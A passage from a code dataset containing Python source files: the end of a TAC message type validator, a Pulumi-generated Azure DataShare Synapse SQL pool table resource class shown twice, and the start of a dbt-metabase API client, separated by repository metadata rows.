key_of_good_id_to_name,
value_of_good_id_to_name,
) in self.good_id_to_name.items():
enforce(
type(key_of_good_id_to_name) == str,
"Invalid type for dictionary keys in content 'good_id_to_name'. Expected 'str'. Found '{}'.".format(
type(key_of_good_id_to_name)
),
)
enforce(
type(value_of_good_id_to_name) == str,
"Invalid type for dictionary values in content 'good_id_to_name'. Expected 'str'. Found '{}'.".format(
type(value_of_good_id_to_name)
),
)
enforce(
type(self.version_id) == str,
"Invalid type for content 'version_id'. Expected 'str'. Found '{}'.".format(
type(self.version_id)
),
)
if self.is_set("info"):
expected_nb_of_contents += 1
info = cast(Dict[str, str], self.info)
enforce(
type(info) == dict,
"Invalid type for content 'info'. Expected 'dict'. Found '{}'.".format(
type(info)
),
)
for key_of_info, value_of_info in info.items():
enforce(
type(key_of_info) == str,
"Invalid type for dictionary keys in content 'info'. Expected 'str'. Found '{}'.".format(
type(key_of_info)
),
)
enforce(
type(value_of_info) == str,
"Invalid type for dictionary values in content 'info'. Expected 'str'. Found '{}'.".format(
type(value_of_info)
),
)
elif self.performative == TacMessage.Performative.TRANSACTION_CONFIRMATION:
expected_nb_of_contents = 3
enforce(
type(self.transaction_id) == str,
"Invalid type for content 'transaction_id'. Expected 'str'. Found '{}'.".format(
type(self.transaction_id)
),
)
enforce(
type(self.amount_by_currency_id) == dict,
"Invalid type for content 'amount_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.amount_by_currency_id)
),
)
for (
key_of_amount_by_currency_id,
value_of_amount_by_currency_id,
) in self.amount_by_currency_id.items():
enforce(
type(key_of_amount_by_currency_id) == str,
"Invalid type for dictionary keys in content 'amount_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_amount_by_currency_id)
),
)
enforce(
type(value_of_amount_by_currency_id) == int,
"Invalid type for dictionary values in content 'amount_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_amount_by_currency_id)
),
)
enforce(
type(self.quantities_by_good_id) == dict,
"Invalid type for content 'quantities_by_good_id'. Expected 'dict'. Found '{}'.".format(
type(self.quantities_by_good_id)
),
)
for (
key_of_quantities_by_good_id,
value_of_quantities_by_good_id,
) in self.quantities_by_good_id.items():
enforce(
type(key_of_quantities_by_good_id) == str,
"Invalid type for dictionary keys in content 'quantities_by_good_id'. Expected 'str'. Found '{}'.".format(
type(key_of_quantities_by_good_id)
),
)
enforce(
type(value_of_quantities_by_good_id) == int,
"Invalid type for dictionary values in content 'quantities_by_good_id'. Expected 'int'. Found '{}'.".format(
type(value_of_quantities_by_good_id)
),
)
elif self.performative == TacMessage.Performative.TAC_ERROR:
expected_nb_of_contents = 1
enforce(
type(self.error_code) == CustomErrorCode,
"Invalid type for content 'error_code'. Expected 'ErrorCode'. Found '{}'.".format(
type(self.error_code)
),
)
if self.is_set("info"):
expected_nb_of_contents += 1
info = cast(Dict[str, str], self.info)
enforce(
type(info) == dict,
"Invalid type for content 'info'. Expected 'dict'. Found '{}'.".format(
type(info)
),
)
for key_of_info, value_of_info in info.items():
enforce(
type(key_of_info) == str,
"Invalid type for dictionary keys in content 'info'. Expected 'str'. Found '{}'.".format(
type(key_of_info)
),
)
enforce(
type(value_of_info) == str,
"Invalid type for dictionary values in content 'info'. Expected 'str'. Found '{}'.".format(
type(value_of_info)
),
)
enforce(
expected_nb_of_contents == actual_nb_of_contents,
"Incorrect number of contents. Expected {}. Found {}".format(
expected_nb_of_contents, actual_nb_of_contents
),
)
if self.message_id == 1:
enforce(
self.target == 0,
"Invalid 'target'. Expected 0 (because 'message_id' is 1). Found {}.".format(
self.target
),
)
except (AEAEnforceError, ValueError, KeyError) as e:
_default_logger.error(str(e))
return False
return True
| true | true |
1c3323146779e0cbb445f721075cc2454146f5ce | 13,377 | py | Python | sdk/python/pulumi_azure_native/datashare/synapse_workspace_sql_pool_table_data_set.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/datashare/synapse_workspace_sql_pool_table_data_set.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/datashare/synapse_workspace_sql_pool_table_data_set.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = ['SynapseWorkspaceSqlPoolTableDataSetArgs', 'SynapseWorkspaceSqlPoolTableDataSet']
@pulumi.input_type
class SynapseWorkspaceSqlPoolTableDataSetArgs:
    """Input properties for constructing a SynapseWorkspaceSqlPoolTableDataSet resource.

    NOTE: this class is generated Pulumi SDK code; its shape (property names,
    ``pulumi.getter``/setter pairs) is introspected by ``@pulumi.input_type``.
    """
    def __init__(__self__, *,
                 account_name: pulumi.Input[str],
                 kind: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 share_name: pulumi.Input[str],
                 synapse_workspace_sql_pool_table_resource_id: pulumi.Input[str],
                 data_set_name: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a SynapseWorkspaceSqlPoolTableDataSet resource.
        :param pulumi.Input[str] account_name: The name of the share account.
        :param pulumi.Input[str] kind: Kind of data set.
               Expected value is 'SynapseWorkspaceSqlPoolTable'.
        :param pulumi.Input[str] resource_group_name: The resource group name.
        :param pulumi.Input[str] share_name: The name of the share to add the data set to.
        :param pulumi.Input[str] synapse_workspace_sql_pool_table_resource_id: Resource id of the Synapse Workspace SQL Pool Table
        :param pulumi.Input[str] data_set_name: The name of the dataSet.
        """
        pulumi.set(__self__, "account_name", account_name)
        # The caller-supplied ``kind`` value is intentionally discarded: the
        # discriminator is pinned to the only value this resource type accepts.
        pulumi.set(__self__, "kind", 'SynapseWorkspaceSqlPoolTable')
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        pulumi.set(__self__, "share_name", share_name)
        pulumi.set(__self__, "synapse_workspace_sql_pool_table_resource_id", synapse_workspace_sql_pool_table_resource_id)
        if data_set_name is not None:
            pulumi.set(__self__, "data_set_name", data_set_name)
    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> pulumi.Input[str]:
        """
        The name of the share account.
        """
        return pulumi.get(self, "account_name")
    @account_name.setter
    def account_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "account_name", value)
    @property
    @pulumi.getter
    def kind(self) -> pulumi.Input[str]:
        """
        Kind of data set.
        Expected value is 'SynapseWorkspaceSqlPoolTable'.
        """
        return pulumi.get(self, "kind")
    @kind.setter
    def kind(self, value: pulumi.Input[str]):
        pulumi.set(self, "kind", value)
    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The resource group name.
        """
        return pulumi.get(self, "resource_group_name")
    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)
    @property
    @pulumi.getter(name="shareName")
    def share_name(self) -> pulumi.Input[str]:
        """
        The name of the share to add the data set to.
        """
        return pulumi.get(self, "share_name")
    @share_name.setter
    def share_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "share_name", value)
    @property
    @pulumi.getter(name="synapseWorkspaceSqlPoolTableResourceId")
    def synapse_workspace_sql_pool_table_resource_id(self) -> pulumi.Input[str]:
        """
        Resource id of the Synapse Workspace SQL Pool Table
        """
        return pulumi.get(self, "synapse_workspace_sql_pool_table_resource_id")
    @synapse_workspace_sql_pool_table_resource_id.setter
    def synapse_workspace_sql_pool_table_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "synapse_workspace_sql_pool_table_resource_id", value)
    @property
    @pulumi.getter(name="dataSetName")
    def data_set_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the dataSet.
        """
        return pulumi.get(self, "data_set_name")
    @data_set_name.setter
    def data_set_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "data_set_name", value)
class SynapseWorkspaceSqlPoolTableDataSet(pulumi.CustomResource):
    """A Synapse Workspace Sql Pool Table data set.
    API Version: 2020-09-01.

    NOTE: this class is generated Pulumi SDK code.
    """
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 account_name: Optional[pulumi.Input[str]] = None,
                 data_set_name: Optional[pulumi.Input[str]] = None,
                 kind: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 share_name: Optional[pulumi.Input[str]] = None,
                 synapse_workspace_sql_pool_table_resource_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        A Synapse Workspace Sql Pool Table data set.
        API Version: 2020-09-01.
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] account_name: The name of the share account.
        :param pulumi.Input[str] data_set_name: The name of the dataSet.
        :param pulumi.Input[str] kind: Kind of data set.
               Expected value is 'SynapseWorkspaceSqlPoolTable'.
        :param pulumi.Input[str] resource_group_name: The resource group name.
        :param pulumi.Input[str] share_name: The name of the share to add the data set to.
        :param pulumi.Input[str] synapse_workspace_sql_pool_table_resource_id: Resource id of the Synapse Workspace SQL Pool Table
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: SynapseWorkspaceSqlPoolTableDataSetArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        A Synapse Workspace Sql Pool Table data set.
        API Version: 2020-09-01.
        :param str resource_name: The name of the resource.
        :param SynapseWorkspaceSqlPoolTableDataSetArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two supported calling conventions
        # (an Args object vs. individual keyword arguments).
        resource_args, opts = _utilities.get_resource_args_opts(SynapseWorkspaceSqlPoolTableDataSetArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       account_name: Optional[pulumi.Input[str]] = None,
                       data_set_name: Optional[pulumi.Input[str]] = None,
                       kind: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       share_name: Optional[pulumi.Input[str]] = None,
                       synapse_workspace_sql_pool_table_resource_id: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = SynapseWorkspaceSqlPoolTableDataSetArgs.__new__(SynapseWorkspaceSqlPoolTableDataSetArgs)
            if account_name is None and not opts.urn:
                raise TypeError("Missing required property 'account_name'")
            __props__.__dict__["account_name"] = account_name
            __props__.__dict__["data_set_name"] = data_set_name
            if kind is None and not opts.urn:
                raise TypeError("Missing required property 'kind'")
            # The discriminator is always written as the pinned constant,
            # regardless of the caller-supplied ``kind`` value.
            __props__.__dict__["kind"] = 'SynapseWorkspaceSqlPoolTable'
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            if share_name is None and not opts.urn:
                raise TypeError("Missing required property 'share_name'")
            __props__.__dict__["share_name"] = share_name
            if synapse_workspace_sql_pool_table_resource_id is None and not opts.urn:
                raise TypeError("Missing required property 'synapse_workspace_sql_pool_table_resource_id'")
            __props__.__dict__["synapse_workspace_sql_pool_table_resource_id"] = synapse_workspace_sql_pool_table_resource_id
            # Output-only properties start unset (None).
            __props__.__dict__["data_set_id"] = None
            __props__.__dict__["name"] = None
            __props__.__dict__["system_data"] = None
            __props__.__dict__["type"] = None
        # Aliases for legacy and API-versioned type tokens of this resource.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:datashare:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20181101preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20181101preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20191101:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20191101:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20200901:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20200901:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20201001preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20201001preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20210801:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20210801:SynapseWorkspaceSqlPoolTableDataSet")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(SynapseWorkspaceSqlPoolTableDataSet, __self__).__init__(
            'azure-native:datashare:SynapseWorkspaceSqlPoolTableDataSet',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None) -> 'SynapseWorkspaceSqlPoolTableDataSet':
        """
        Get an existing SynapseWorkspaceSqlPoolTableDataSet resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        # Properties are initialized to None; they are resolved when the
        # existing resource is read back.
        __props__ = SynapseWorkspaceSqlPoolTableDataSetArgs.__new__(SynapseWorkspaceSqlPoolTableDataSetArgs)
        __props__.__dict__["data_set_id"] = None
        __props__.__dict__["kind"] = None
        __props__.__dict__["name"] = None
        __props__.__dict__["synapse_workspace_sql_pool_table_resource_id"] = None
        __props__.__dict__["system_data"] = None
        __props__.__dict__["type"] = None
        return SynapseWorkspaceSqlPoolTableDataSet(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter(name="dataSetId")
    def data_set_id(self) -> pulumi.Output[str]:
        """
        Unique id for identifying a data set resource
        """
        return pulumi.get(self, "data_set_id")
    @property
    @pulumi.getter
    def kind(self) -> pulumi.Output[str]:
        """
        Kind of data set.
        Expected value is 'SynapseWorkspaceSqlPoolTable'.
        """
        return pulumi.get(self, "kind")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Name of the azure resource
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="synapseWorkspaceSqlPoolTableResourceId")
    def synapse_workspace_sql_pool_table_resource_id(self) -> pulumi.Output[str]:
        """
        Resource id of the Synapse Workspace SQL Pool Table
        """
        return pulumi.get(self, "synapse_workspace_sql_pool_table_resource_id")
    @property
    @pulumi.getter(name="systemData")
    def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
        """
        System Data of the Azure resource.
        """
        return pulumi.get(self, "system_data")
    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        Type of the azure resource
        """
        return pulumi.get(self, "type")
| 46.936842 | 1,089 | 0.676684 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = ['SynapseWorkspaceSqlPoolTableDataSetArgs', 'SynapseWorkspaceSqlPoolTableDataSet']
@pulumi.input_type
class SynapseWorkspaceSqlPoolTableDataSetArgs:
    """Input properties for constructing a SynapseWorkspaceSqlPoolTableDataSet resource.

    NOTE: generated Pulumi SDK code; the class shape is introspected by
    ``@pulumi.input_type``.
    """
    def __init__(__self__, *,
                 account_name: pulumi.Input[str],
                 kind: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 share_name: pulumi.Input[str],
                 synapse_workspace_sql_pool_table_resource_id: pulumi.Input[str],
                 data_set_name: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a SynapseWorkspaceSqlPoolTableDataSet resource.
        :param pulumi.Input[str] account_name: The name of the share account.
        :param pulumi.Input[str] kind: Kind of data set.
               Expected value is 'SynapseWorkspaceSqlPoolTable'.
        :param pulumi.Input[str] resource_group_name: The resource group name.
        :param pulumi.Input[str] share_name: The name of the share to add the data set to.
        :param pulumi.Input[str] synapse_workspace_sql_pool_table_resource_id: Resource id of the Synapse Workspace SQL Pool Table
        :param pulumi.Input[str] data_set_name: The name of the dataSet.
        """
        pulumi.set(__self__, "account_name", account_name)
        # The caller-supplied ``kind`` is discarded; the discriminator is pinned.
        pulumi.set(__self__, "kind", 'SynapseWorkspaceSqlPoolTable')
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        pulumi.set(__self__, "share_name", share_name)
        pulumi.set(__self__, "synapse_workspace_sql_pool_table_resource_id", synapse_workspace_sql_pool_table_resource_id)
        if data_set_name is not None:
            pulumi.set(__self__, "data_set_name", data_set_name)
    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> pulumi.Input[str]:
        """
        The name of the share account.
        """
        return pulumi.get(self, "account_name")
    @account_name.setter
    def account_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "account_name", value)
    @property
    @pulumi.getter
    def kind(self) -> pulumi.Input[str]:
        """
        Kind of data set.
        Expected value is 'SynapseWorkspaceSqlPoolTable'.
        """
        return pulumi.get(self, "kind")
    @kind.setter
    def kind(self, value: pulumi.Input[str]):
        pulumi.set(self, "kind", value)
    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The resource group name.
        """
        return pulumi.get(self, "resource_group_name")
    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)
    @property
    @pulumi.getter(name="shareName")
    def share_name(self) -> pulumi.Input[str]:
        """
        The name of the share to add the data set to.
        """
        return pulumi.get(self, "share_name")
    @share_name.setter
    def share_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "share_name", value)
    @property
    @pulumi.getter(name="synapseWorkspaceSqlPoolTableResourceId")
    def synapse_workspace_sql_pool_table_resource_id(self) -> pulumi.Input[str]:
        """
        Resource id of the Synapse Workspace SQL Pool Table
        """
        return pulumi.get(self, "synapse_workspace_sql_pool_table_resource_id")
    @synapse_workspace_sql_pool_table_resource_id.setter
    def synapse_workspace_sql_pool_table_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "synapse_workspace_sql_pool_table_resource_id", value)
    @property
    @pulumi.getter(name="dataSetName")
    def data_set_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the dataSet.
        """
        return pulumi.get(self, "data_set_name")
    @data_set_name.setter
    def data_set_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "data_set_name", value)
class SynapseWorkspaceSqlPoolTableDataSet(pulumi.CustomResource):
    """A Synapse Workspace Sql Pool Table data set.
    API Version: 2020-09-01.

    NOTE: generated Pulumi SDK code.
    """
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 account_name: Optional[pulumi.Input[str]] = None,
                 data_set_name: Optional[pulumi.Input[str]] = None,
                 kind: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 share_name: Optional[pulumi.Input[str]] = None,
                 synapse_workspace_sql_pool_table_resource_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        A Synapse Workspace Sql Pool Table data set.
        API Version: 2020-09-01.
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] account_name: The name of the share account.
        :param pulumi.Input[str] data_set_name: The name of the dataSet.
        :param pulumi.Input[str] kind: Kind of data set.
               Expected value is 'SynapseWorkspaceSqlPoolTable'.
        :param pulumi.Input[str] resource_group_name: The resource group name.
        :param pulumi.Input[str] share_name: The name of the share to add the data set to.
        :param pulumi.Input[str] synapse_workspace_sql_pool_table_resource_id: Resource id of the Synapse Workspace SQL Pool Table
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: SynapseWorkspaceSqlPoolTableDataSetArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        A Synapse Workspace Sql Pool Table data set.
        API Version: 2020-09-01.
        :param str resource_name: The name of the resource.
        :param SynapseWorkspaceSqlPoolTableDataSetArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two supported calling conventions
        # (an Args object vs. individual keyword arguments).
        resource_args, opts = _utilities.get_resource_args_opts(SynapseWorkspaceSqlPoolTableDataSetArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       account_name: Optional[pulumi.Input[str]] = None,
                       data_set_name: Optional[pulumi.Input[str]] = None,
                       kind: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       share_name: Optional[pulumi.Input[str]] = None,
                       synapse_workspace_sql_pool_table_resource_id: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = SynapseWorkspaceSqlPoolTableDataSetArgs.__new__(SynapseWorkspaceSqlPoolTableDataSetArgs)
            if account_name is None and not opts.urn:
                raise TypeError("Missing required property 'account_name'")
            __props__.__dict__["account_name"] = account_name
            __props__.__dict__["data_set_name"] = data_set_name
            if kind is None and not opts.urn:
                raise TypeError("Missing required property 'kind'")
            # The discriminator is always written as the pinned constant.
            __props__.__dict__["kind"] = 'SynapseWorkspaceSqlPoolTable'
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            if share_name is None and not opts.urn:
                raise TypeError("Missing required property 'share_name'")
            __props__.__dict__["share_name"] = share_name
            if synapse_workspace_sql_pool_table_resource_id is None and not opts.urn:
                raise TypeError("Missing required property 'synapse_workspace_sql_pool_table_resource_id'")
            __props__.__dict__["synapse_workspace_sql_pool_table_resource_id"] = synapse_workspace_sql_pool_table_resource_id
            # Output-only properties start unset (None).
            __props__.__dict__["data_set_id"] = None
            __props__.__dict__["name"] = None
            __props__.__dict__["system_data"] = None
            __props__.__dict__["type"] = None
        # Aliases for legacy and API-versioned type tokens of this resource.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:datashare:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20181101preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20181101preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20191101:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20191101:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20200901:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20200901:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20201001preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20201001preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20210801:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20210801:SynapseWorkspaceSqlPoolTableDataSet")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(SynapseWorkspaceSqlPoolTableDataSet, __self__).__init__(
            'azure-native:datashare:SynapseWorkspaceSqlPoolTableDataSet',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None) -> 'SynapseWorkspaceSqlPoolTableDataSet':
        """
        Get an existing SynapseWorkspaceSqlPoolTableDataSet resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        # Properties are initialized to None; they are resolved when the
        # existing resource is read back.
        __props__ = SynapseWorkspaceSqlPoolTableDataSetArgs.__new__(SynapseWorkspaceSqlPoolTableDataSetArgs)
        __props__.__dict__["data_set_id"] = None
        __props__.__dict__["kind"] = None
        __props__.__dict__["name"] = None
        __props__.__dict__["synapse_workspace_sql_pool_table_resource_id"] = None
        __props__.__dict__["system_data"] = None
        __props__.__dict__["type"] = None
        return SynapseWorkspaceSqlPoolTableDataSet(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter(name="dataSetId")
    def data_set_id(self) -> pulumi.Output[str]:
        """
        Unique id for identifying a data set resource
        """
        return pulumi.get(self, "data_set_id")
    @property
    @pulumi.getter
    def kind(self) -> pulumi.Output[str]:
        """
        Kind of data set.
        Expected value is 'SynapseWorkspaceSqlPoolTable'.
        """
        return pulumi.get(self, "kind")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Name of the azure resource
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="synapseWorkspaceSqlPoolTableResourceId")
    def synapse_workspace_sql_pool_table_resource_id(self) -> pulumi.Output[str]:
        """
        Resource id of the Synapse Workspace SQL Pool Table
        """
        return pulumi.get(self, "synapse_workspace_sql_pool_table_resource_id")
    @property
    @pulumi.getter(name="systemData")
    def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
        """
        System Data of the Azure resource.
        """
        return pulumi.get(self, "system_data")
    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        Type of the azure resource
        """
        return pulumi.get(self, "type")
| true | true |
1c33247d1ebd76b37c331b06ae4b8b207ceb0b05 | 16,856 | py | Python | dbtmetabase/metabase.py | venturehacks/dbt-metabase | 8fd76c5b2dab180fca24b6742b68f5f668a3e7cb | [
"MIT"
] | null | null | null | dbtmetabase/metabase.py | venturehacks/dbt-metabase | 8fd76c5b2dab180fca24b6742b68f5f668a3e7cb | [
"MIT"
] | null | null | null | dbtmetabase/metabase.py | venturehacks/dbt-metabase | 8fd76c5b2dab180fca24b6742b68f5f668a3e7cb | [
"MIT"
] | null | null | null | import json
import logging
from typing import Any, Sequence, Optional, Tuple, Iterable, MutableMapping, Union
import requests
import time
from .models.metabase import MetabaseModel, MetabaseColumn
class MetabaseClient:
"""Metabase API client."""
_SYNC_PERIOD_SECS = 5
    def __init__(
        self,
        host: str,
        user: str,
        password: str,
        use_http: bool = False,
        verify: Optional[Union[str, bool]] = None,
    ):
        """Constructor. Authenticates against Metabase immediately.

        Arguments:
            host {str} -- Metabase hostname.
            user {str} -- Metabase username.
            password {str} -- Metabase password.

        Keyword Arguments:
            use_http {bool} -- Use HTTP instead of HTTPS. (default: {False})
            verify {Optional[Union[str, bool]]} -- Path to certificate or disable verification. (default: {None})
        """
        self.host = host
        # Scheme used when building request URLs.
        self.protocol = "http" if use_http else "https"
        self.verify = verify
        # Performs network I/O: obtains a session token via POST /api/session.
        self.session_id = self.get_session_id(user, password)
        logging.info("Session established successfully")
def get_session_id(self, user: str, password: str) -> str:
"""Obtains new session ID from API.
Arguments:
user {str} -- Metabase username.
password {str} -- Metabase password.
Returns:
str -- Session ID.
"""
return self.api(
"post",
"/api/session",
authenticated=False,
json={"username": user, "password": password},
)["id"]
def sync_and_wait(
self, database: str, schema: str, models: Sequence, timeout: Optional[int]
) -> bool:
"""Synchronize with the database and wait for schema compatibility.
Arguments:
database {str} -- Metabase database name.
schema {str} -- Metabase schema name.
models {list} -- List of dbt models read from project.
Keyword Arguments:
timeout {int} -- Timeout before giving up in seconds. (default: {30})
Returns:
bool -- True if schema compatible with models, false if still incompatible.
"""
if timeout is None:
timeout = 30
if timeout < self._SYNC_PERIOD_SECS:
logging.critical(
"Timeout provided %d secs, must be at least %d",
timeout,
self._SYNC_PERIOD_SECS,
)
return False
database_id = self.find_database_id(database)
if not database_id:
logging.critical("Cannot find database by name %s", database)
return False
self.api("post", f"/api/database/{database_id}/sync_schema")
deadline = int(time.time()) + timeout
sync_successful = False
while True:
sync_successful = self.models_compatible(database_id, schema, models)
time_after_wait = int(time.time()) + self._SYNC_PERIOD_SECS
